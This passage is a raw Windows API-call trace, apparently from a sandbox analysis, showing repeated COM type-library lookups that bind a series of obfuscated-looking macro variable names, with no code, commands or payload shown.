IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.469] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jkQ_AA", lHashVal=0x104b54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.469] IUnknown:Release (This=0x665ba50) returned 0xb [0068.469] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.469] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jkQ_AA", lHashVal=0x104b54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.469] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.469] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.469] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jkQ_AA", lHashVal=0x104b54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.469] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.469] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.469] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jkQ_AA", lHashVal=0x104b54, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.469] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.469] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.469] IUnknown:Release (This=0x665ba50) returned 0xb [0068.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1c0a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_jkQ_AA") returned 14 [0068.469] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jkQ_AA", lHashVal=0x104b54, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0) returned 0x0 [0068.469] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba27ce | out: _Dst=0x145020) returned 0x0 [0068.469] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fbbb0 [0068.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27f6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="KXkwDGD") returned 8 [0068.469] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KXkwDGD", lHashVal=0x10f6f8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27f6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="KXkwDGD") returned 8 [0068.469] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KXkwDGD", lHashVal=0x10f6f8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27f6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="KXkwDGD") returned 8 [0068.470] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KXkwDGD", lHashVal=0x10f6f8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.470] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KXkwDGD") returned 0x10f6f8 [0068.470] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="KXkwDGD" | out: _Dst="KXkwDGD") returned 0x0 [0068.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="KXkwDGD") returned 8 [0068.470] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.470] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KXkwDGD", lHashVal=0x10f6f8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.470] IUnknown:Release (This=0x665ba50) returned 0xb [0068.470] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.470] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KXkwDGD", lHashVal=0x10f6f8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.470] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.470] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.470] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KXkwDGD", lHashVal=0x10f6f8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.470] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.470] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.470] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KXkwDGD", lHashVal=0x10f6f8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.470] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba27f6, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="KXkwDGD") returned 8 [0068.470] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KXkwDGD", lHashVal=0x10f6f8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.470] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.470] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba27f6 | out: _Dst=0x67c2d60) returned 0x0 [0068.470] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KXkwDGD") returned 0x10fa7c [0068.470] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_KXkwDGD" | out: _Dst="_B_var_KXkwDGD") returned 0x0 [0068.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_KXkwDGD") returned 15 [0068.470] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.470] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KXkwDGD", lHashVal=0x10fa7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.470] IUnknown:Release (This=0x665ba50) returned 0xb [0068.470] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.471] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KXkwDGD", lHashVal=0x10fa7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.471] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.471] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.471] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KXkwDGD", lHashVal=0x10fa7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.471] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.471] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.471] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KXkwDGD", lHashVal=0x10fa7c, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.471] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.471] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.471] IUnknown:Release (This=0x665ba50) returned 0xb [0068.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1c3a, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_KXkwDGD") returned 15 [0068.471] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KXkwDGD", lHashVal=0x10fa7c, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4b005f00720061, ppTypeComp=0x44007700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4b005f00720061, ppTypeComp=0x44007700000000, pDummy=0x0) returned 0x0 [0068.471] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba27f6 | out: _Dst=0x145020) returned 0x0 [0068.471] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NU1UcACA", lHashVal=0x10e0d8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba281e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="NU1UcACA") returned 9 [0068.472] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NU1UcACA", lHashVal=0x10e0d8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba281e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="NU1UcACA") returned 9 [0068.472] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NU1UcACA", lHashVal=0x10e0d8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.472] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NU1UcACA") returned 0x10e0d8 [0068.472] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="NU1UcACA" | out: _Dst="NU1UcACA") returned 0x0 [0068.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="NU1UcACA") returned 9 [0068.472] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.472] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NU1UcACA", lHashVal=0x10e0d8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.472] IUnknown:Release (This=0x665ba50) returned 0xb [0068.472] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.472] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NU1UcACA", lHashVal=0x10e0d8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.472] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.472] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.472] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NU1UcACA", lHashVal=0x10e0d8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.472] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.472] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.472] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NU1UcACA", lHashVal=0x10e0d8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.472] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba281e, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="NU1UcACA") returned 9 [0068.472] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NU1UcACA", lHashVal=0x10e0d8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.472] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.472] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba281e | out: _Dst=0x67c2d60) returned 0x0 [0068.472] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NU1UcACA") returned 0x10b861 [0068.473] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_NU1UcACA" | out: _Dst="_B_var_NU1UcACA") returned 0x0 [0068.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_NU1UcACA") returned 16 [0068.473] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.473] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NU1UcACA", lHashVal=0x10b861, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.473] IUnknown:Release (This=0x665ba50) returned 0xb [0068.473] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.473] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NU1UcACA", lHashVal=0x10b861, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.473] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.473] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.473] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_NU1UcACA", lHashVal=0x10b861, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.473] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.473] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.473] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_NU1UcACA", lHashVal=0x10b861, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.473] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.473] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.473] IUnknown:Release (This=0x665ba50) returned 0xb [0068.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1c6a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_NU1UcACA") returned 16 [0068.473] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_NU1UcACA", lHashVal=0x10b861, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4e005f00720061, ppTypeComp=0x63005500000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4e005f00720061, ppTypeComp=0x63005500000000, pDummy=0x0) returned 0x0 [0068.473] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba281e | out: _Dst=0x145020) returned 0x0 [0068.473] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lBGBAX", lHashVal=0x108974, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba284a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="lBGBAX") returned 7 [0068.473] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lBGBAX", lHashVal=0x108974, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba284a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="lBGBAX") returned 7 [0068.473] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lBGBAX", lHashVal=0x108974, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lBGBAX") returned 0x108974 [0068.474] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="lBGBAX" | out: _Dst="lBGBAX") returned 0x0 [0068.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="lBGBAX") returned 7 [0068.474] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.474] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lBGBAX", lHashVal=0x108974, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.474] IUnknown:Release (This=0x665ba50) returned 0xb [0068.474] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.474] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lBGBAX", lHashVal=0x108974, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.474] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.474] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.474] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lBGBAX", lHashVal=0x108974, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.474] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.474] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.474] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lBGBAX", lHashVal=0x108974, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.474] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba284a, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="lBGBAX") returned 7 [0068.474] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lBGBAX", lHashVal=0x108974, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.474] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.474] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba284a | out: _Dst=0x67c2d60) returned 0x0 [0068.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lBGBAX") returned 0x1003de [0068.474] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_lBGBAX" | out: _Dst="_B_var_lBGBAX") returned 0x0 [0068.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_lBGBAX") returned 14 [0068.474] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.474] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lBGBAX", lHashVal=0x1003de, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.474] IUnknown:Release (This=0x665ba50) returned 0xb [0068.474] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.474] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lBGBAX", lHashVal=0x1003de, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.474] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.474] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.474] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lBGBAX", lHashVal=0x1003de, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.474] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.475] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.475] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lBGBAX", lHashVal=0x1003de, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.475] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.475] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.475] IUnknown:Release (This=0x665ba50) returned 0xb [0068.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1c9a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_lBGBAX") returned 14 [0068.475] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lBGBAX", lHashVal=0x1003de, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x6c005f00720061, ppTypeComp=0x41004200000000, pDummy=0x0) returned 0x0 [0068.475] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba284a | out: _Dst=0x145020) returned 0x0 [0068.475] ITypeComp:RemoteBind (in: This=0x665ba60, szName="l4_AAAZ", lHashVal=0x102bba, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2872, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="l4_AAAZ") returned 8 [0068.475] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="l4_AAAZ", lHashVal=0x102bba, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2872, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="l4_AAAZ") returned 8 [0068.475] ITypeComp:RemoteBind (in: This=0x665bd30, szName="l4_AAAZ", lHashVal=0x102bba, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="l4_AAAZ") returned 0x102bba [0068.475] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="l4_AAAZ" | out: _Dst="l4_AAAZ") returned 0x0 [0068.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="l4_AAAZ") returned 8 [0068.475] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.475] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="l4_AAAZ", lHashVal=0x102bba, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.475] IUnknown:Release (This=0x665ba50) returned 0xb [0068.475] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.475] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="l4_AAAZ", lHashVal=0x102bba, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.476] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.476] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.476] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="l4_AAAZ", lHashVal=0x102bba, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, 